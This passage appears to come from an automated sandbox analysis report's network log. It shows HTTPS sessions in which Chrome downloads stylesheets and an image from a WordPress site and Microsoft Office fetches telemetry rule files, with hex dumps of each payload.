                                                                                                                      2024-12-03 07:55:28 UTC7909INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 41 6e 69 6d 61 74 65 2e 63 73 73 20 2d 20 68 74 74 70 3a 2f 2f 64 61 6e 65 64 65 6e 2e 6d 65 2f 61 6e 69 6d 61 74 65 0a 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 0a 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 20 44 61 6e 69 65 6c 20 45 64 65 6e 0a 2a 2f 2e 61 6e 69 6d 61 74 65 64 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 73 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 62 6f
                                                                                                                      Data Ascii: @charset "UTF-8";/*!Animate.css - http://daneden.me/animateLicensed under the MIT license - http://opensource.org/licenses/MITCopyright (c) 2014 Daniel Eden*/.animated{-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:bo
                                                                                                                      2024-12-03 07:55:28 UTC8000INData Raw: 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 39 37 2c 2e 39 37 2c 2e 39 37 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 39 37 2c 2e 39 37 2c 2e 39 37 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 31 2c 31 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 31 2c 31 2c 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 49 6e 7b 30 25 2c 31 30 30 25 2c 32 30 25 2c 34 30 25 2c 36 30 25 2c 38 30 25 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 31 35 2c 2e 36 31 2c 2e 33 35 35 2c 31 29 7d 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b
                                                                                                                      Data Ascii: bkit-transform:scale3d(.97,.97,.97);transform:scale3d(.97,.97,.97)}100%{opacity:1;-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}}@keyframes bounceIn{0%,100%,20%,40%,60%,80%{transition-timing-function:cubic-bezier(.215,.61,.355,1)}0%{opacity:0;
                                                                                                                      2024-12-03 07:55:28 UTC8000INData Raw: 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 49 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 2e 66 61 64 65 49 6e 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 64 65 49 6e 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 64 65 49 6e 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 49 6e 44 6f 77 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 2d 31 30 30 25 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 2d 31 30 30 25 2c 30 29 7d 31 30 30 25 7b 6f
                                                                                                                      Data Ascii: pacity:0}100%{opacity:1}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}.fadeIn{-webkit-animation-name:fadeIn;animation-name:fadeIn}@-webkit-keyframes fadeInDown{0%{opacity:0;-webkit-transform:translate3d(0,-100%,0);transform:translate3d(0,-100%,0)}100%{o
                                                                                                                      2024-12-03 07:55:28 UTC8000INData Raw: 31 2c 30 2c 2d 31 37 30 64 65 67 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 7d 38 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 70 65 72 73 70 65 63 74 69 76 65 28 34 30 30 70 78 29 20 73 63 61 6c 65 33 64 28 2e 39 35 2c 2e 39 35 2c 2e 39 35 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 70 65 72 73 70 65 63 74 69 76 65 28 34 30 30 70 78 29 20 73 63 61 6c 65 33 64 28 2e 39 35 2c 2e 39 35 2c 2e 39 35 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69
                                                                                                                      Data Ascii: 1,0,-170deg);-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in}80%{-webkit-transform:perspective(400px) scale3d(.95,.95,.95);transform:perspective(400px) scale3d(.95,.95,.95);-webkit-animation-timing-function:ease-in;animation-ti
                                                                                                                      2024-12-03 07:55:28 UTC8000INData Raw: 63 69 74 79 3a 30 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 49 6e 44 6f 77 6e 52 69 67 68 74 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 33 64
                                                                                                                      Data Ascii: city:0}100%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:none;transform:none;opacity:1}}@keyframes rotateInDownRight{0%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate3d
                                                                                                                      2024-12-03 07:55:28 UTC8000INData Raw: 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 34 37 35 2c 2e 34 37 35 2c 2e 34 37 35 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 36 30 70 78 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 37 35 2c 2e 38 38 35 2c 2e 33 32 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 37 35 2c 2e 38 38 35 2c 2e 33 32 2c 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 7a 6f 6f 6d 49 6e 44 6f 77 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 31 2c 2e 31 2c 2e 31 29 20 74 72 61 6e 73 6c 61 74
                                                                                                                      Data Ascii: ransform:scale3d(.475,.475,.475) translate3d(0,60px,0);-webkit-animation-timing-function:cubic-bezier(.175,.885,.32,1);animation-timing-function:cubic-bezier(.175,.885,.32,1)}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale3d(.1,.1,.1) translat
                                                                                                                      2024-12-03 07:55:28 UTC3971INData Raw: 61 74 65 33 64 28 30 2c 36 30 70 78 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 34 37 35 2c 2e 34 37 35 2c 2e 34 37 35 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 36 30 70 78 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 35 2c 2e 30 35 35 2c 2e 36 37 35 2c 2e 31 39 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 35 2c 2e 30 35 35 2c 2e 36 37 35 2c 2e 31 39 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 31 2c 2e 31 2c 2e 31 29 20 74 72 61 6e 73 6c 61 74
                                                                                                                      Data Ascii: ate3d(0,60px,0);transform:scale3d(.475,.475,.475) translate3d(0,60px,0);-webkit-animation-timing-function:cubic-bezier(.55,.055,.675,.19);animation-timing-function:cubic-bezier(.55,.055,.675,.19)}100%{opacity:0;-webkit-transform:scale3d(.1,.1,.1) translat


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      131192.168.2.44989213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:27 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:27 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:27 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 468
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                      x-ms-request-id: bd78242f-a01e-003d-3eee-4498d7000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075527Z-174f7845968frfdmhC1EWRxxbw00000015n0000000007tp8
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:27 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      132192.168.2.449894196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:27 UTC377OUTGET /wp-content/uploads/2018/03/core.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:28 UTC259INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:27 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:19 GMT
                                                                                                                      ETag: "a8c-56723b60747c0"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 2700
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:28 UTC2700INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 86 00 00 00 79 08 06 00 00 00 fc bd 59 5d 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 0a 2e 49 44 41 54 78 da ec 9d ed 6f 14 45 1c c7 7f 57 a1 b4 45 69 0b da d2 92 c0 89 45 53 54 38 10 54 82 d0 23 f8 80 09 05 9a 08 be 93 eb 5f 40 fb 17 14 de f9 ae 25 be 82 c4 f4 2a af 34 1a 0a e5 85 31 12 9e 42 88 8f 39 10 21 88 ca 41 02 0d 0f 95 ab 0a 14 88 c6 f9 75 b6 b6 85 b6 b7 3b 3b 33 bf 99 dd f9 26 6b 25 d0 bd bd d9 cf 7e 7f 0f 3b bb 53 02 4e 4e 13 a8 c4 0d 81 93 03 c3 c9 81 e1 14 4e d3 62 f3 4d fb 06 aa d8 7f 53 de 9f f0 67 55 91 df c8 b1 ad 30 bc 35 cf c9 c5 0d 8c 44 44 21 48 7b 27 7f 29 db 92 6c 4b 4b d8 6b de db 8e 79 d0 e4 18 30 79
                                                                                                                      Data Ascii: PNGIHDRyY]tEXtSoftwareAdobe ImageReadyqe<.IDATxoEWEiEST8T#_@%*41B9!Au;;3&k%~;SNNNbMSgU05DD!H{')lKKky0y


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      133192.168.2.44989513.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:27 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:27 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:27 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 174
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                      x-ms-request-id: 058c760e-201e-0051-7c6f-407340000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075527Z-174f78459688l8rvhC1EWRtzr00000000k5000000000a0d3
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:27 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      134192.168.2.44989613.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:27 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:27 UTC494INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:27 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 1952
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                                      x-ms-request-id: bb9ca025-001e-00ad-031e-45554b000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075527Z-174f78459685726chC1EWRsnbg00000015sg000000002ds4
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:27 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      135192.168.2.449900196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:28 UTC604OUTGET /wp-content/themes/salient/css/build/style-non-critical.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:29 UTC283INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:28 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "60ca-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 24778
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:29 UTC7909INData Raw: 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 6c 68 65 3d 61 6e 69 6d 61 74 65 64 5f 75 6e 64 65 72 6c 69 6e 65 5d 20 23 74 6f 70 20 6e 61 76 3e 75 6c 3e 6c 69 3e 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 32 73 20 65 61 73 65 7d 2e 73 66 2d 6d 65 6e 75 3e 6c 69 3e 61 3e 2e 73 66 2d 73 75 62 2d 69 6e 64 69 63 61 74 6f 72 20 69 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 32 73 20 65 61 73 65 7d 2e 73 66 2d 73 68 61 64 6f 77 20 2e 73 66 2d 73 68 61 64 6f 77 2d 6f 66 66 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 20 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 20 30 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 23 68 65 61 64 65 72 2d 6f 75 74 65 72 3a 6e 6f 74 28 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 72 65 73 69 7a 65
                                                                                                                      Data Ascii: #header-outer[data-lhe=animated_underline] #top nav>ul>li>a{transition:color .2s ease}.sf-menu>li>a>.sf-sub-indicator i{transition:color .2s ease}.sf-shadow .sf-shadow-off{background:none repeat scroll 0 0 transparent}#header-outer:not([data-header-resize
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 2e 6d 61 74 65 72 69 61 6c 20 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2e 73 6c 69 64 65 2d 6f 75 74 2d 66 72 6f 6d 2d 72 69 67 68 74 20 2e 6f 66 66 2d 63 61 6e 76 61 73 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 23 73 6f 63 69 61 6c 2d 69 6e 2d 6d 65 6e 75 20 61 3a 68 6f 76 65 72 20 69 2c 2e 6d 61 74 65 72 69
                                                                                                                      Data Ascii: it-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}.material #slide-out-widget-area.slide-out-from-right .off-canvas-social-links a{display:inline-block;margin-right:0;margin-left:0;overflow:hidden}#header-outer #social-in-menu a:hover i,.materi
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 2e 30 37 29 7d 2e 62 6c 6f 67 2d 72 65 63 65 6e 74 20 2e 6d 6f 72 65 2d 6c 69 6e 6b 20 73 70 61 6e 3a 68 6f 76 65 72 2c 2e 70 6f 73 74 20 2e 6d 6f 72 65 2d 6c 69 6e 6b 20 73 70 61 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 70 6f 73 74 20 2e 70 6f 73 74 2d 68 65 61 64 65 72 20 68 32 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 70 6f 73 74 2e 71 75 6f 74 65 20 2e 63 6f 6e 74 65 6e 74 2d 69 6e 6e 65 72 20 2e 71 75 6f 74 65 2d 69 6e 6e 65 72 3a 68 6f 76 65 72 20 2e 77 68 6f 6c 65 2d 6c 69 6e 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 33 7d 2e 70 6f 73 74 2e 6c 69 6e 6b 20 2e 70 6f 73 74 2d 63 6f 6e 74 65 6e 74 20 61 3a 68 6f 76 65 72 20 2e 6c 69 6e 6b 2d 69 6e
                                                                                                                      Data Ascii: .07)}.blog-recent .more-link span:hover,.post .more-link span:hover{background-color:#000}.post .post-header h2 a:hover{color:inherit}.post.quote .content-inner .quote-inner:hover .whole-link{background-color:#333}.post.link .post-content a:hover .link-in
                                                                                                                      2024-12-03 07:55:29 UTC869INData Raw: 65 77 2d 69 6e 64 69 63 61 74 6f 72 2e 76 69 73 69 62 6c 65 20 73 70 61 6e 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 6e 65 63 74 61 72 2d 64 72 61 67 2d 69 6e 64 69 63 61 74 6f 72 2e 76 69 73 69 62 6c 65 2e 70 6f 69 6e 74 65 72 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 38 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 2e 32 35 73 20 65 61 73 65 2d 6f 75 74 2c 6f 70 61 63 69 74 79 20 2e 33 73 20 65 61 73 65 7d 2e 6e 65 63 74 61 72 2d 76 69 65 77 2d 69 6e 64 69 63 61 74 6f 72 3a 6e 6f 74 28 2e 73 74 79 6c 65 2d 73 65 65 2d 74 68 72 6f 75 67 68 29 7b 6d 69 78 2d 62 6c 65 6e 64 2d 6d 6f 64 65 3a 6e 6f 72 6d 61 6c 7d 2e 6e 65 63 74 61 72 2d
                                                                                                                      Data Ascii: ew-indicator.visible span{transform:scale(1);opacity:1}.nectar-drag-indicator.visible.pointer-down:before{transform:scale(.8);transition:transform .25s ease-out,opacity .3s ease}.nectar-view-indicator:not(.style-see-through){mix-blend-mode:normal}.nectar-


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      136192.168.2.449904196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
